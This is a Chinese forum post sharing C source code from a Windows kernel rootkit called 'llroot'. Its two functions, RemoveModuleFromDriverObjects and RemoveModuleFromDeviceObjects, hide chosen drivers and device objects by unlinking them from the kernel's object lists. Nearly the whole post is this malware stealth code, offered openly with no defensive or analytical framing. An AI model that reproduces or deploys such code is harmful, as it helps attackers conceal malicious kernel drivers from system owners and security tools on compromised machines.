<a target=_blank href="http://bbs.ednchina.com/BLOG_ARTICLE_99800.HTM">原文地址http://bbs.ednchina.com/BLOG_ARTICLE_99800.HTM</a>
remove module from device objects
在rootkit.com上一个russian hacker发的文章中提到这两种方法,和他交流了下,在llroot中实现了,代码贴出来灌水:
/******************************************************************************
**
** The following routines implement hide driver by removing module from
** driver objects and device objects
**
*******************************************************************************/
void RemoveModuleFromDriverObjects(void)
{
POBJECT_TYPE DriverType=*IoDriverObjectType;
PLIST_ENTRY e_prev,e_next,entry0,entry1;
PDRIVER_OBJECT obj;
PUNICODE_STRING punistrDriverName;
PANSI_STRING pstrDriverName;
NTSTATUS ntStatus;
ULONG d_size;
entry0=DriverType->ObjectListHead.Flink;
entry1=entry0;
punistrDriverName=(PUNICODE_STRING) ExAllocatePool(PagedPool, sizeof(UNICODE_STRING)+(sizeof(WCHAR)*1024));
if (punistrDriverName == NULL)
{
DbgPrint("llroot-->punistrDriverName allocate failed\n");
return;
}
punistrDriverName->Length=0;
punistrDriverName->MaximumLength = 1022;
punistrDriverName->Buffer = (PWSTR)((DWORD)punistrDriverName + sizeof(UNICODE_STRING));
pstrDriverName=(PANSI_STRING)ExAllocatePool(PagedPool,sizeof(ANSI_STRING)+sizeof(CHAR)*1024);
if(pstrDriverName== NULL)
{
ExFreePool(punistrDriverName);
return;
}
pstrDriverName->Length=0;
pstrDriverName->MaximumLength=1022;
pstrDriverName->Buffer=(PCHAR)((DWORD)pstrDriverName + sizeof(ANSI_STRING));
do
{
obj=(PDRIVER_OBJECT)((PBYTE)entry1+0x28);
RtlFillMemory(punistrDriverName->Buffer,1022,'0');
punistrDriverName->Length=0;
punistrDriverName->MaximumLength=1022;
ntStatus = ObQueryNameString(obj,
(POBJECT_NAME_INFORMATION) punistrDriverName,
punistrDriverName->MaximumLength,
&d_size);
if(!NT_SUCCESS(ntStatus))
goto next;
DbgPrint("llroot-->Module Name:%S\n",punistrDriverName->Buffer);
if(RtlUnicodeStringToAnsiString(pstrDriverName,punistrDriverName,FALSE)==STATUS_SUCCESS)
{
pstrDriverName->Length=GetBaseModuleName(pstrDriverName->Buffer,pstrDriverName->Length);
DbgPrint("llroot-->pstrDivername:%s\t\t length:%d\n",pstrDriverName->Buffer,pstrDriverName->Length);
if(WalkHideDriverList(pstrDriverName->Buffer,pstrDriverName->Length-1))
{
DbgPrint("llroot-->Now we hide driver:%s\n",pstrDriverName->Buffer);
e_prev = entry1->Blink;
e_next = entry1->Flink;
e_prev->Flink = e_next;
e_next->Blink = e_prev;
}
}
next:
entry1 = entry1->Flink;
}while(entry1!=entry0);
ExFreePool(punistrDriverName);
ExFreePool(pstrDriverName);
}
void RemoveModuleFromDeviceObjects(PDRIVER_OBJECT pDriverObj)
{
POBJECT_TYPE DeviceType=*IoDeviceObjectType;
PLIST_ENTRY e_prev,e_next,entry0,entry1;
PDEVICE_OBJECT obj;
entry0=DeviceType->ObjectListHead.Flink;
entry1=entry0;
do
{
obj=(PDEVICE_OBJECT)((PBYTE)entry1+0x28);
if((pDriverObj!=NULL)&&(obj->DriverObject==pDriverObj))
{
DbgPrint("llroot-->Now we hide device:0x%.8x\n",(DWORD)obj);
e_prev = entry1->Blink;
e_next = entry1->Flink;
e_prev->Flink = e_next;
e_next->Blink = e_prev;
goto next;
}
if(WalkHideDeviceList(obj))
{
DbgPrint("llroot-->Now we hide device:0x%.8x\n",(DWORD)obj);
e_prev = entry1->Blink;
e_next = entry1->Flink;
e_prev->Flink = e_next;
e_next->Blink = e_prev;
}
next:
entry1 = entry1->Flink;
}while(entry1!=entry0);
}
3148
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
